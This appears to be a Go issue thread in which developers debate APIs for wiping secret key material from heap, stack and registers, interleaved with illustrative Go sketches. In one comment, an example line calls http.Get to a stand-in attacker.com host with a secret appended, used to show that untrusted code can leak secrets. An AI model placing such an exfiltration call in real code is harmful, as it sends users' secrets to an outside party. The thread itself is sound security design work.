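
The time-bounded exposure described above can be illustrated with a toy key ratchet. This is a hedged sketch using a simple hash chain, which is a simplification for illustration and not WireGuard's real mechanism (WireGuard generates fresh ephemeral DH keys rather than hashing forward): after each ratchet step, a snapshot of live memory exposes only the current epoch, provided no stray copies survive.

```go
package main

import (
	"crypto/sha256"
	"fmt"
)

// ratchet derives the next epoch key from the current one and wipes
// the old one, so a later memory dump cannot recover past epochs.
// Toy illustration of forward secrecy via a hash chain; not how
// WireGuard actually rekeys.
func ratchet(key *[32]byte) {
	next := sha256.Sum256(key[:])
	for i := range key {
		key[i] = 0 // best-effort wipe; in Go, hidden copies may survive
	}
	*key = next
}

func main() {
	var key [32]byte
	copy(key[:], "initial session key material....")

	old := key // an attacker's snapshot of the current epoch
	ratchet(&key)

	// After the ratchet, the live key no longer reveals the old epoch.
	fmt.Println(key == old) // false
}
```

As the thread discusses, the wipe inside ratchet is exactly the step Go cannot currently guarantee: intermediates on the stack and any copies the runtime made are out of reach.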

Comment From: zx2c4

I am sort of skeptical the kernel actually pulls it off for the random subsystem, but if we had a way to do our part we should.

Rather than throwing shade on one of the most security critical subsystems of the kernel, maybe you should point to real bugs if you see them so that I can fix those bugs. If you find zeroing leaks like that in random.c or its surrounding infrastructure (chacha.c and such), that's something I would really like to know about and fix. I don't take the attitude that, "awww it's too hard to get right, just give up". In the kernel, this is a more tractable problem than in Go.

The point is that there isn't a reliable way to do this, in Go and in all other languages. It's not just the [16]byte that needs wiping, it's the stacks of all the ECDHE functions, the memory that held the derived symmetric key for the duration of the connection, the stacks of all the AEAD functions, the registers used for hardware-accelerated cryptography...

I agree that the problem is extremely hard to solve in Go, but this doesn't apply to other languages as heavily. You can accomplish this in different settings. And again, with the exception of my Go code, if you find failures to do this in code that I maintain, I would like to know about it. This is a property I care about preserving.

If one thinks that C/C++ make it possible, they can reach for memguard and do the exact same thing in Go. I don't believe it's sufficient at scale, and I don't know of better solutions.

I don't think that's quite right. Memguard will give you a fixed region in Go. But as soon as you pass that memory off to any functions that deal with slices or copies or other variables, we're back at the same Go issue again. That's a different story from C or C++ where you can more carefully control how memory is moved around on the stack, zeroize buffers, and so forth.
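
A tiny sketch of the failure mode described above (the function names here are invented for illustration; no real memguard API is used): wiping a "protected" buffer does nothing for copies that ordinary Go code has already made.

```go
package main

import "fmt"

// leakCopy stands in for any function that takes a []byte and copies it:
// once that happens, the secret lives in ordinary GC-managed memory.
func leakCopy(b []byte) []byte {
	return append([]byte(nil), b...)
}

// wipe zeroes b in place.
func wipe(b []byte) {
	for i := range b {
		b[i] = 0
	}
}

func main() {
	locked := []byte{1, 2, 3, 4} // stand-in for a memguard-locked buffer
	leaked := leakCopy(locked)   // an innocent-looking copy

	wipe(locked)        // wiping the "protected" region...
	fmt.Println(leaked) // ...doesn't touch the copy: prints [1 2 3 4]
}
```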

Comment From: zx2c4

@ianlancetaylor @FiloSottile and others -- just to try to bring a bit of frankness back to this discussion, let's establish some things:

  • Zeroing memory is important for forward secrecy in cryptographic protocols.
  • Languages that are very low level have an easier job of doing this than languages that are higher level.
  • Nobody currently has any idea how to do this well, coherently, pervasively, and so on in Go.

Would you say that's an accurate description of where we are, or do you contest any of those statements? Assuming that's all correct, this seems to leave us with a hard-to-solve compiler problem. I'll try to summarize a few solutions discussed so far:

1) Introduce a []sbyte type, which the compiler won't copy around. Problem: why just byte? What if people need other types?

2) Introduce duplicates of all the types -- sbyte, sint -- or, similarly, add some attribute to type names (these amount to the same thing). Problem: does this then allow passing to functions that take the non-s variety, with the compiler doing taint analysis? That seems hard to do. Alternatively, does it mean that we have to have two implementations of all functions? That also seems very hard to do.

3) Allocate using smake(...) to return memory that will be marked as tainted. Problem: is it possible to do efficient taint analysis like this?

I don't really know enough about this space of compiler design to assess these without lots of questions. For years, Go was blocked on generics until some experts came up with something that looked within reach and desirable, and now in retrospect it seems so obvious. With memzeroing, I view us as currently in that preceding stage: not enough current expertise or a spark of an idea to figure out how best to implement it.

So it is not implemented. And that's an understandable predicament.

But it isn't because "memzeroing is not useful for cryptography" or "no program anywhere does it well anyway" or "that is necessarily an intractable problem" or reasoning along those grounds. It's just a hard problem to solve right in Go.

Comment From: ianlancetaylor

Thanks for the explanation. Sorry I don't know much about this stuff.

I think that the chances that we can correctly implement []sbyte in the compiler, and then maintain that correctness over time, are low. I think it would be rather more likely to make this work in a library. Anything you can write in C you can write in Go using the unsafe package and syscall.Mmap, so if you are confident that this library can be written in C, then it can be written in Go. So perhaps we should be thinking in terms of an API that can implement what is required, rather than trying to apply security requirements to the compiler or the GC.
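
A rough sketch of the library approach described above, assuming a Unix system (a portable library would need per-OS code; this uses syscall.Mmap and syscall.Mlock directly): memory obtained this way lives outside the Go heap, so the GC never duplicates or moves it, and mlock keeps it out of swap.

```go
package main

import (
	"fmt"
	"syscall"
)

// secretBuf allocates n bytes outside the Go heap via mmap, so the GC
// never duplicates or moves them, and mlocks the region so it cannot
// be swapped to disk.
func secretBuf(n int) ([]byte, error) {
	b, err := syscall.Mmap(-1, 0, n,
		syscall.PROT_READ|syscall.PROT_WRITE,
		syscall.MAP_ANON|syscall.MAP_PRIVATE)
	if err != nil {
		return nil, err
	}
	if err := syscall.Mlock(b); err != nil {
		syscall.Munmap(b)
		return nil, err
	}
	return b, nil
}

// destroy zeroes the buffer and returns it to the OS.
func destroy(b []byte) error {
	for i := range b {
		b[i] = 0
	}
	syscall.Munlock(b)
	return syscall.Munmap(b)
}

func main() {
	key, err := secretBuf(32)
	if err != nil {
		panic(err)
	}
	copy(key, "0123456789abcdef0123456789abcdef")
	// ... use key ...
	if err := destroy(key); err != nil {
		panic(err)
	}
	fmt.Println("allocated, used, and wiped")
}
```

Note that this only protects the buffer itself; as discussed throughout the thread, intermediates on goroutine stacks and in registers remain out of its reach.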

Comment From: josharian

This is far from my realm of expertise.

But I wonder whether this would be tractable if there was a compiler/runtime mode that aggressively zeroed everything it could. (Copied a goroutine stack? Zero the previous one. Returning from a function? Zero all the stack and registers you used. GC’d some heap space? Zero it. Etc.)

It would be very expensive, much like the spectre mode Russ added. But maybe for security-sensitive uses this would be an acceptable tradeoff.

Comment From: FiloSottile

Rather than throwing shade on one of the most security critical subsystems of the kernel, maybe you should point to real bugs if you see them so that I can fix those bugs. If you find zeroing leaks like that in random.c or its surrounding infrastructure (chacha.c and such), that's something I would really like to know about and fix. I don't take the attitude that, "awww it's too hard to get right, just give up". In the kernel, this is a more tractable problem than in Go.

I'm not throwing shade, I am actually a fan of the current iteration of the random subsystem. I am saying the kernel is a complex beast, and this is a complex task, and as far as I know there is no good way to do regression tests for this, so I don't feel confident in relying on that property. You know PoC||GTFO is not how it works; finding bugs in C is not my skillset. The mocking doesn't help anyone, either.

For years, Go was blocked on generics until some experts came up with something that looked within reach and desirable, and now in retrospect it seems so obvious. With memzeroing, I view us as currently in that preceding stage: not enough current expertise or a spark of an idea to figure how best to implement it.

I like this parallel a lot and was thinking about it earlier. I would add that generics wasn't just the spark of an idea, it was a lot of systematic design and experimentation work. I think you are overall correct. I remain skeptical that the average application written in any language achieves the goal it aims for when it zeroes memory (WireGuard's software quality is not average even among other cryptographic code), and if we are making significant changes I want them to work for the average application, not just for the most careful ones. Anyway, we agree on the conclusion of where Go is at.

But I wonder whether this would be tractable if there was a compiler/runtime mode that aggressively zeroed everything it could. (Copied a goroutine stack? Zero the previous one. Returning from a function? Zero all the stack and registers you used. GC’d some heap space? Zero it. Etc.)

It would be very expensive, much like the spectre mode Russ added. But maybe for security-sensitive uses this would be an acceptable tradeoff.

Not a bad idea! I don't love the proliferation of "--securer" flags, but Spectre mitigations and this have in common that they are security measures that are very hard to achieve with a more targeted approach, but are necessary only for applications with a specific threat model (for Spectre, applications that run on the same CPU as hostile code, for this, applications that expect their memory to be compromised later and want to defend against it).

How much complexity would that bring into the compiler/runtime, and how likely are we to regress on it (like by adding a new stack copying edge case and forgetting to implement zeroing)?

Comment From: aclements

But I wonder whether this would be tractable if there was a compiler/runtime mode that aggressively zeroed everything it could.

I think this wouldn't be particularly hard. The GC can certainly zero everything it frees. I'm not sure the compiler even needs to be that aggressive about zeroing things on the stack or in registers, since the runtime could zero the unused stack on every scan (which wouldn't be as immediate as every function return, but would be just as immediate as zeroing the heap on free). This would be expensive, but I don't think tremendously so.

Taking this idea and running with it... We've occasionally talked about what "isolates" would look like in Go, usually for resource isolation, crash isolation, or monitoring isolation, and I'm aware of some academic work that added isolates to Go for trusted execution in an enclave. If we did this sort of "global zeroing", one could imagine creating an isolate just for handling key material and enabling zeroing only within that isolate, especially if it's a runtime option. To me, that seems more tractable than trying to do something in the type system, while limiting the cost and being more palatable than a truly global "--securer" flag.

Comment From: randall77

since the runtime could zero the unused stack on every scan (which wouldn't be as immediate as every function return, but would be just as immediate as zeroing the heap on free).

We don't currently know what is unused. The portion of the stack that isn't allocated, sure, but within allocated frames there may be parts that are unused and contain old secrets. We have liveness information only for pointerful values, we'd have to extend the liveness information to all values to zero out unused portions correctly.

Comment From: aclements

We don't currently know what is unused. The portion of the stack that isn't allocated, sure ...

That's true. I only meant the unused portion of the stack, versus every unused stack slot. You're right that that could be hiding key material, and I agree we'd need scalar reachability information to correctly wipe those at GC (at some point this whole approach starts to depend on how good the GC is at minimizing lifetimes). Though perhaps it wouldn't be surprising that key material could remain on the stack if a function that handles key material is on the stack. Some compiler optimizations (inlining) could muddy those waters, though.

Comment From: randall77

The tricky case is we call something that puts secrets on the stack, it returns, then we call something else, and that something else's stack frame has a portion that is never initialized (because its use is guarded by a conditional, or is alignment padding, or whatever).

Comment From: dr2chase

Two ideas:

If a function zeroed its own frame just before returning, that would remove secrets from the stack memory pretty quickly, no special liveness analysis required. How much of the problem would this mitigate? And would most of the benefit come from doing it to important functions, versus doing it for all functions everywhere?

Idea number two, it sounds like doing this in the garbage collector provides a somewhat expensive half-measure. In the usual case, do people know the lifetime of the secret data? I.e., is the problem here that

  1. by default Go says "hmm, looks like it escapes, I'll put that on the heap" even though the person writing the code has a very good idea what the lifetime of the sensitive data should be, or
  2. the programmer says "this is secret stuff, I'm not sure what its lifetime is so it goes on the heap, but once everyone is done with it, I want it wiped."

If it's the first one, I think a library makes more sense, if you can put up with the friction of calling methods to get at the data. The data itself can be specially allocated using whatever mmap works best to avoid the data being paged/swapped to disk, and the Go wrapper object can include a call to wipe it when done, and ALSO have a finalizer that will wipe it if the wipe() call is missed (and maybe to raise some sort of an alert in testing, since this is a late wipe). A targeted compiler option to allow zeroing a particular function's frames might help. Generics might make this a little easier, too -- the library still might need to do unsafe things, but in a more structured way.

If it's the second one, I think we want something a lot more like a more-secure compiler/runtime option where data is aggressively zeroed as soon as we know it isn't useful -- if the sensitive data truly "escapes" to heap, who knows for sure what's sensitive, zero all the things, ASAP.
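
A minimal sketch of the library shape in the first idea (the type and method names here are invented for illustration): an explicit wipe plus a finalizer safety net. A real version would also back the storage with mmap/mlock to avoid swapping, which is omitted here.

```go
package main

import (
	"fmt"
	"runtime"
)

// Secret holds sensitive bytes and guarantees a wipe: explicitly via
// Wipe, or, as a late fallback, via a finalizer when the GC collects it.
type Secret struct {
	data  []byte
	wiped bool
}

func NewSecret(n int) *Secret {
	s := &Secret{data: make([]byte, n)}
	runtime.SetFinalizer(s, func(s *Secret) {
		if !s.wiped {
			// Late wipe; a test build could raise an alert here.
			s.Wipe()
		}
	})
	return s
}

// Bytes exposes the underlying storage; callers must not retain copies.
func (s *Secret) Bytes() []byte { return s.data }

// Wipe zeroes the storage and marks the secret as destroyed.
func (s *Secret) Wipe() {
	for i := range s.data {
		s.data[i] = 0
	}
	s.wiped = true
}

func main() {
	s := NewSecret(32)
	copy(s.Bytes(), "ephemeral key material..........")
	// ... use the key ...
	s.Wipe()
	fmt.Println(s.Bytes()[0], s.wiped) // 0 true
}
```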

Comment From: rsc

We can't answer the question "should we do this?" without first answering "what is it we are thinking about doing?" Have we answered the latter question yet?

The original issue was asking for a kind of bzero for internal data structures, but we've identified that that's not good enough because data is copied around by implementations and might be lurking elsewhere. So now we've talked about having a special compiler mode that zeros everything as it dies, to avoid having any kind of special tagging. Sensitive applications would opt into this mode and presumably run a bit slower.

Would that work for your use case @zx2c4? And do we really know all the things that would involve on the compiler and runtime side?

Comment From: zx2c4

Sadly not. If the software is slow, nobody will use it, and it doesn't really matter how many security features it has. The thing needs to still work well.

Basically, I need to be able to zero the stack of crypto-sensitive functions on return, and zero various malloc'd slices when I'm done with them.

Comment From: ianlancetaylor

Providing a function that zeroes a slice, whether heap-allocated or stack-allocated, is easy.

I don't think it would be too hard to add a compiler pragma that directs the function to, as it returns, zero out its own stack frame and all registers. The zeroing would also have to be done when a panic unwinds through the stack frame. The pragma would imply that the function was not inlinable. Of course other functions called by this one would have to use the pragma themselves where appropriate.

I still think that for most people this would be a trap, letting them think that they are getting more security than they actually are. But if people think this would be useful, I'm not going to block it.
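
For reference, the easy part mentioned above might look like the following sketch. runtime.KeepAlive is used here only as a best-effort hint: unlike C's explicit_bzero, Go offers no guaranteed optimization barrier, though its compiler does not currently elide such stores.

```go
package main

import (
	"fmt"
	"runtime"
)

// zeroSlice overwrites b with zeros, whether heap- or stack-allocated.
// There is no explicit_bzero-style guarantee in Go; runtime.KeepAlive
// merely hints that b is still live after the stores.
func zeroSlice(b []byte) {
	for i := range b {
		b[i] = 0
	}
	if len(b) > 0 {
		runtime.KeepAlive(&b[0])
	}
}

func main() {
	key := []byte{0xDE, 0xAD, 0xBE, 0xEF}
	zeroSlice(key)
	fmt.Println(key) // [0 0 0 0]
}
```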

Comment From: rsc

Thanks for the reply @zx2c4. It sounds like we need to understand the threat model more. Which of these are important?

  1. being able to zero a heap-allocated slice, array, or struct
  2. being able to mark a heap-allocated slice, array, or struct as "secret".
  3. being able to mark stack-allocated data as "secret"
  4. guaranteeing that any registers that hold data copied from secrets are cleared
  5. guaranteeing that any stack memory that holds data copied from secrets is cleared
  6. guaranteeing that the memory holding secrets is never swapped to disk by the OS

It seems like we know how to do 1 and maybe 2. But the others are more difficult. So is 2 enough? We could plausibly do:

x := new(thing)
markSecret(x)
// copy secrets into x

and at that point markSecret would force it to be heap allocated and arrange for the GC to clear it when collected. Then the only issue is any potential stack copies made (accidentally?) by the program as well as derived data like registers during crypto algorithms. How much do you care about that sort of stuff?
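
To make that two-step shape concrete, here is a userland sketch of the hypothetical markSecret. This is not a proposed implementation: a finalizer only clears on collection, with none of the no-hidden-copies or forced-heap-allocation guarantees a real runtime version would need.

```go
package main

import (
	"fmt"
	"reflect"
	"runtime"
)

// markSecret arranges for *p to be zeroed when the GC collects it.
// A real runtime facility would also pin the value and prevent hidden
// copies; this finalizer-based stand-in is illustrative only.
func markSecret[T any](p *T) {
	runtime.SetFinalizer(p, func(p *T) {
		v := reflect.ValueOf(p).Elem()
		v.Set(reflect.Zero(v.Type()))
	})
}

type sessionKey struct{ material [32]byte }

func main() {
	x := new(sessionKey)
	markSecret(x)
	copy(x.material[:], "0123456789abcdef0123456789abcdef")
	fmt.Println(len(x.material)) // 32
}
```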

Comment From: rsc

Ping @zx2c4 if you have any input about the questions in the previous comment.

Comment From: vparla

There is truth on both sides of the discussion.

It's certainly true, that a perfect implementation may very well be impractical and/or even technically impossible, like @FiloSottile and others on the Go team are warning. But it is also true that there are steps that can be taken to reduce the risk of sensitive material exposure, a reduction that may turn out significant or even sufficient for most if not all practical purposes, as @magicalo is arguing.

I think it all comes down to damage control, to reducing the risk, even if total elimination is unfeasible. I may be wrong, though, maybe it really makes more sense to do nothing at all; I'm willing to be swayed.

Precisely. This is about narrowing the window of exposure. I concur with @magicalo on that aspect of the problem statement. I also think an explicit type like sbyte that has these secure properties allows a user to understand what they are getting (vs some function that they may or may not call - e.g. runtime.MarkSensitive().)

I also concur with @zx2c4 in terms of PFS and how Go doesn't really allow for truly implementing PFS without adding some ability to do what is being asked here.

We can make perfect the enemy of the good here and do nothing. I would rather have something improved than nothing at all.

Comment From: ianlancetaylor

@vparla I'm not going to argue that we shouldn't do anything in this space.

But when it comes to security there is a real difference between the perfect and the good. A system that is insecure with regard to a particular threat model remains insecure even if you take steps that appear to reduce the risk. In practice there is a very thin line between "I understand exactly what it means to use this feature" and "using this feature will make my system more secure." The former is fine. The latter is actively dangerous, as it leads to a false feeling of security and encourages people to think that they have made the system more secure when in fact they have not affected its security at all. We should strive to only add features that make the system genuinely more secure, and to avoid adding features that appear to reduce risk without eliminating it.

Again, I'm not arguing that we shouldn't do anything. I'm arguing that "it reduces the risk" is not a strong argument for a security feature unless we can reasonably say "it eliminates the risk."

Comment From: rsc

I think we are still waiting on the answers to which of the 6 levels in https://github.com/golang/go/issues/21865#issuecomment-806033088 would be the first useful level for real applications.

@vparla, what does your application strictly need? @zx2c4, yours?

Comment From: rsc

Ping @vparla, @zx2c4 for any comments re what your application needs. (See my previous comment.)

Comment From: vparla

Ping @vparla, @zx2c4 for any comments re what your application needs. (See my previous comment.)

I would like explicit type(s) that, when new'd, do the marking for me so that I don't have to do two steps:

x := new(thing) // this also marks it as secret so I don't have to do it later
// alternative:
x := secretnew(thing)

I would like to explicitly zero-erase an object and not simply rely on a finalizer to do it. (e.g. an option to explicitly erase it).

I would want guarantees that if the runtime moves my object it secure-erases the memory that previously held my object.

  1. being able to zero a heap-allocated slice, array, or struct [MUST]
  2. being able to mark a heap-allocated slice, array, or struct as "secret" [MUST]
  3. being able to mark stack-allocated data as "secret" [MUST]
  4. guaranteeing that any registers that hold data copied from secrets are cleared [NICE TO HAVE]
  5. guaranteeing that any stack memory that holds data copied from secrets is cleared [NICE TO HAVE]
  6. guaranteeing that the memory holding secrets is never swapped to disk by the OS [NICE TO HAVE]

Comment From: dr2chase

From a compiler-writer's POV, is this the sort of thing that is likely to be confined to a few applications, or likely to happen in a library that is used in a variety of applications? And do these "secret" types implement interfaces in ways that might cause them to land in data structures, or are they pretty much standalone? (I'm trying to imagine some implementation options and problems -- interfaces are a "problem" because now the secret-ness is hidden. Whole-application might be easier because maybe everything just runs in "secret mode" then, i.e., zero everything aggressively.)

Comment From: awnumar

How will existing libraries (for example stdlib crypto libs) be handled? If they perform their own allocations, won't they be incompatible with these changes? Either they'd have to be updated to use whatever "secure" data type is implemented, or there would have to be a variant that accepts pointers to containers that were securely allocated by the caller.

Comment From: rsc

@zx2c4 could use your opinion on https://github.com/golang/go/issues/21865#issuecomment-806033088

Comment From: zx2c4

Sorry for the delay @rsc. Answers inline:

being able to zero a heap-allocated slice, array, or struct

Yes.

being able to mark a heap-allocated slice, array, or struct as "secret".

Yes, though it'd probably be enough for this marking to just amount to, "runtime won't copy it elsewhere unless I ask it to." Zeroing it automatically on free would be nice too.

being able to mark stack-allocated data as "secret"

Yes, though I'd be fine with a more manual version of this, in which you just call defer runtime.ClearStack(), and that ensures all stack used by that function and its children is zeroed out. The runtime already keeps track of current stack depth, so this should be a simple memset operation.

guaranteeing that any stack memory that holds data copied from secrets is cleared guaranteeing that any registers that hold data copied from secrets are cleared

I think so, but only insofar as these are implicit copies that I couldn't have prevented myself. For example:

var a [32]byte
copy(a[:], mysecret[:])

I don't think this is a case in which we necessarily need complicated taint analysis. If operations implicitly start copying secrets, then maybe that's a problem, but perhaps that kind of thing would be handled simply by defer runtime.ClearStack().

guaranteeing that the memory holding secrets is never swapped to disk by the OS

Sounds potentially very nasty to do, especially with nested structs, so maybe a bit too ambitious to start with.

It seems like we know how to do 1 and maybe 2. But the others are more difficult. So is 2 enough? We could plausibly do:

x := new(thing)
markSecret(x)
// copy secrets into x

and at that point markSecret would force it to be heap allocated and arrange for the GC to clear it when collected.

That sounds very good to me. But...

Then the only issue is any potential stack copies made (accidentally?) by the program as well as derived data like registers during crypto algorithms. How much do you care about that sort of stuff?

This is the remaining piece that's slightly concerning while still being I think something practically solvable. Namely, the defer runtime.ClearStack() idea I had above. This wouldn't be automatic, but it would let me opt into doing that for code like:

func computeHandshakeStuff() SessionKey {
    defer runtime.ClearStack()
    Hash(..., ...)
    Hash(..., ...)
    X25519(..., ...)
    Hash(..., ...)
    Hash(..., ...)
    X25519(..., ...)
    Hash(..., ...)
    Hash(..., ...)
    AEAD(..., ...)
    sessionKey := Hash(..., ...)
    markSecret(sessionKey)
    return sessionKey
}

That's kind of a simplified joke of what a Noise handshake looks like, but it's also not so far off :-P. The idea is that after it returns, all the temporaries that those various crypto functions used get cleared in one fell swoop, and then we simply have the one heap-allocated object that escapes, which is marked as secret.

Taken together, markSecret(...) causing zeroing-on-free and preventing hidden copies, and runtime.ClearStack() clearing intermediates that I've used would give me basically what I'm able to achieve now in C.

I imagine the one complication here is that sometimes the escape analysis isn't perfect, and intermediate functions will wind up letting things escape onto the heap, rather than keeping it on the stack, in which case runtime.ClearStack() won't work as desired. I don't understand the problem space here well enough to have a good solution, though.

Comment From: josharian

@zx2c4 one complication is that stacks can get copied as they grow. So doing runtime.ClearStack on function exit isn’t necessarily enough to clear all copies of the data on the stack that may have been made.

Comment From: zx2c4

Hmm. I guess there could be a prior operation to mark that zero-on-copy there is desired. For example:

func computeHandshakeStuff() SessionKey {
    runtime.MarkSecretStack() // Puts the stack in a "secret mode" in which it's possible to reliably clear it after.
    defer runtime.ClearSecretStack() // Panics or is no-op if `MarkSecretStack` wasn't called prior.
    Hash(..., ...)
    Hash(..., ...)
    X25519(..., ...)
    Hash(..., ...)
    Hash(..., ...)
    X25519(..., ...)
    Hash(..., ...)
    Hash(..., ...)
    AEAD(..., ...)
    sessionKey := Hash(..., ...)
    markSecret(sessionKey)
    return sessionKey
}

Comment From: vparla

Ideally we make this as transparent to the user as possible. The less they have to do, the more likely they are to do it correctly. So having an explicit type with security attributes attached would be my preference, since the user only needs to create the new type and all the magic happens under the covers. If an explicit runtime call is required to make this work, then let's try to have as few of those as possible, to ensure the average coder can do things securely and properly.

Comment From: rsc

OK, so it sounds like it would be enough (if we knew how to implement them) to do:

x := new(thing)
runtime.MarkSecret(x)
copy secrets into x

for heap-allocated things, and then separately to have

runtime.MarkSecretStack()
defer runtime.UnmarkSecretStack()

that can be placed at the top of some crypto operations to make sure arguments and locals that appear on the stack between the two actual calls are not preserved. The pair would let the runtime know enough to deal with stack copies correctly. The Mark/Unmark would nest - one increments the "stack is secret" count and the other decrements it, so that children being called that do a Mark/Unmark pair don't undo the parent's mark.

We could keep a low water mark using the stack growth checks in the main Go toolchain, but it is unclear how to implement the stack operations in gccgo or gollvm. It can probably be done, though.

@zx2c4 Do those two APIs suffice for what you want for Wireguard?

Comment From: randall77

It's not clear to me how to implement MarkSecretStack/UnmarkSecretStack. Let f be the function that calls these two functions.

MarkSecretStack would be easier to implement if it applied only to things subsequently called from f, not to f itself. Having it apply to f itself is tough, because we'd have to zero out the frame from under f while it is still running. Particularly, how do we execute from UnmarkSecretStack to the return point? We still need a valid frame for that.

Deferring UnmarkSecretStack is also problematic on a panic path, as it then runs well down the stack, with all the stuff we'd want to zero in between f and the current execution point (but maybe it's all dead at that point?). What if a subsequent defer in f is recovered?

If the secrecy only applies to things called from f, then I think it's easier to implement. There's some inlining that would have to be disabled, but otherwise I can see how it might work.

Comment From: zx2c4

@zx2c4 Do those two APIs suffice for what you want for Wireguard?

Yes, I think those would be pretty much "good enough", with the big caveat that I'm not totally sure how the UnmarkSecretStack zeroing would work reliably, given that lots of intermediate functions tend to let stack results escape to the heap. But maybe I'm misunderstanding something about escape analysis and it actually wouldn't be a problem? Alternatively, one way to work around this would be to make MarkSecretStack's count >0 imply that all heap allocations done on that goroutine are marked as secret, so in case anything escapes, it's not a problem?

Comment From: ianlancetaylor

What if we say that runtime.MarkSecret does not force the pointer to escape? Do we still need runtime.MarkSecretStack? Or would that be too hard to use correctly?

Comment From: josharian

@ianlancetaylor did you mean "forces" instead of "does not force"? (I think the idea proposed is to keep secret things off of the stack entirely, so zeroing the stack is never necessary.)

Comment From: ianlancetaylor

I actually mean "does not force." I am imagining that the compiler would know about runtime.MarkSecret, and when it sees such a value on the stack it would automatically know that it had to zero the stack frame on function return.

Comment From: josharian

Ah! In that case, it could also know that it had to zero that part of the stack on copy as well, which it could communicate to the runtime…somehow.

Comment From: astrolox

x := new(thing)
runtime.MarkSecret(x)
// copy secrets into x

This makes me wonder: is the place that we're copying from also marked secret? That is to say, for this to be practically useful we'll need ways to read from (somewhere) directly into secrets without leaking any of the secret data.

Comment From: FiloSottile

What if we say that runtime.MarkSecret does not force the pointer to escape? Do we still need runtime.MarkSecretStack? Or would that be too hard to use correctly?

If I understand correctly, that would require all variables used by crypto functions to be marked, right? That would be a lot of noise, and require a lot of vigilance in not missing a side-product or intermediate value.

Comment From: zx2c4

Just to summarize where we're at:

  • MarkSecretStack / UnmarkSecretStack -- when the count drops from >0 to 0, the deepest stack used is zeroed.
  • MarkSecret(obj) -- makes the GC zero the memory on free.

One implementation problem I've brought up with MarkSecretStack / UnmarkSecretStack is that it makes escape logic kind of hard, and lots of functions wind up allocating even if the values are thrown away. A remediation I brought up for this was to have all objects allocated with count>0 be implicitly MarkSecret(obj).

But actually, I wonder if there's a way to simplify this whole thing. Let's get rid of MarkSecret(obj) entirely. If you want to make secrets, you run runtime.PushSecretMode(), and when you're done, you run runtime.PopSecretMode(). When count drops from >0 to 0, the deepest stack used is zeroed as before. And all heap objects that are created with count>0 are marked as secret and will be zeroed when freed. In other words, let's get rid of MarkSecret, and have it always implicit via a better-named function.

The advantage of this? It's much much easier to avoid shooting yourself in the foot or having to reason about escapes and memory. If you're about to ingest or generate or work with some secret data, enable the mode. When you're done, you're done. And when objects created during that era aren't useful anymore, they're zeroed out by the GC. This way, there's never a need to think hard about all the weird intermediate objects, what goes on the stack, what goes on the heap, and so forth. The promise is that any memory writes at all (to stack or to heap) during that era are zeroed when no longer useful. That's a very simple guarantee to understand.

Thoughts?

Comment From: rsc

I don't quite understand how secret mode affects goroutines. The implication here seems to be that you enter secret mode, call arbitrary code, and that code is protected by virtue of being in secret mode, without knowing about secret mode at all. But if that arbitrary code does processing in other goroutines, maybe even pre-established ones, those won't be in secret mode, right? Or does secret mode disallow new goroutines, and channel communication, and maybe sync.Cond and sync.Mutex and sync/atomic too?

It feels like we've had a few plausible ideas, but none of them has stood up to careful scrutiny.

Do other languages with memory management have reasonable answers for this?

Comment From: DmitriyMV

@rsc

But if that arbitrary code does processing in other goroutines, maybe even pre-established ones, those won't be in secret mode, right?

I think the idea behind SecretMode is that it only ensures that secrets are cleaned up inside the current goroutine and nothing else. Everything else done by other goroutines, threads, or apps, or secrets stored in files via the os package, is not covered by this design, nor should it be. I don't think any developer will expect SecretMode to work across all goroutines.

We also have something somewhat similar to SecretMode - runtime.LockOSThread which, on goroutine termination, causes thread containing goroutine to exit if runtime.UnlockOSThread wasn’t called.

Comment From: zx2c4

Two approaches:

1) runtime.PushSecretMode() and runtime.PopSecretMode() would be restricted just to the current goroutine. We could add a runtime.IsSecretMode() bool for users who want to manually propagate it to other goroutines.

2) runtime.PushSecretMode() and runtime.PopSecretMode() would be a count for the current goroutine, but if you start a new goroutine when count>0, then the new goroutine starts with count=1.

I keep wavering between 1 and 2. 1 is simpler, but 2 would mean we wouldn't have to care about multiprocessing gotchas (and it seems as though some PQ stuff is sufficiently expensive that threading different parallelizable parts might be desirable).

I don't think it makes sense to have any of this interact with channels or things in the sync package. You can already stupidly copy data to a non secret allocation, just like you could explicitly pass it to a non-secret user through a channel. That seems fine to me and not something we need to get too nervous about or introduce taint analysis. If we go down that route, we'll wind up introducing a whole new type system and things will become woefully complicated.

Comment From: vparla

x := new(thing)
runtime.MarkSecret(x)

Why not collapse these into a single call? e.g. x := secretnew(thing)

Comment From: DmitriyMV

Why not collapse these into a single call? e.g. x := secretnew(thing)

That would add a new keyword for a very specific use case.

Comment From: astrolox

Personally I think the runtime.PushSecretMode() and runtime.PopSecretMode() suggestions are a good idea, because I could see myself enabling it before reading an encrypted file containing my secret, running the decryption, and then finally storing the secret value somewhere accessible before disabling it. The result being that everything I did during that time gets securely erased.

That said, it seems very easy to use incorrectly: there are lots of ways the user of the language can accidentally send data out of their little secret session without realising they'll be losing the protection.

Perhaps writing to a non-secret context (e.g. channels, or copying into already allocated memory, etc.) should be prohibited during secret mode?

Comment From: FiloSottile

The implication here seems to be that you enter secret mode, call arbitrary code, and that code is protected by virtue of being in secret mode, without knowing about secret mode at all.

I don't think that's the goal. Arbitrary code could call http.Get("http://attacker.com/" + secret), after all. The goal is giving cooperating code a chance of protecting a secret without having to be extremely careful about every variable declaration.

Comment From: timothy-king

I don't think that's the goal. Arbitrary code could call http.Get("http://attacker.com/" + secret), after all.

Once the annotations are there, this makes static analysis for such issues much simpler. But that should be at most a side-effect and not a primary concern.

Comment From: rsc

It sounds like MarkSecretStack etc have serious definitional and implementation problems. I don't see a path forward for them. What else is there? Are there any good ideas left?

Java must have this problem. What does Java do for crypto code that wants to do this? Does it just not? And if crypto code in Java does not, then why does Go need to?

Comment From: elagergren-spideroak

Common Criteria requires either:

  1. overwriting the memory with zeros (for (int i = 0; ...)), or
  2. destroying the reference (p = null) followed by calling System.gc

That should pass their tests, which include dumping the proc's memory and checking for key material.

Common Criteria, like FIPS, doesn't always require the latest or best coding practices. But it's an indication of what they consider feasible for protecting national security documents.

Comment From: rsc

It may be that we made a wrong turn trying to address the stack. The problem is that the stack secrecy doesn't know which data matters. You end up with an implicit setting that is difficult to propagate and understand. Much as we made context explicit rather than using invisible thread-local storage, we probably should keep secrecy explicit too.

What if we go back to just allocated objects and being able to keep them (1) secret (no implicit copies) and (2) cleared on demand? Then we would only need:

x := secret.New[[32]byte]()
fill x with key material, use it
secret.Clear(&x)

x := secret.Make[[]byte](100)
fill x with key material, use it
secret.Clear(x)

We know how to implement those. And having the special allocators would let us store them in other memory if we wanted to later. And it sounds like Common Criteria would be happy with those. Do we need more than that?

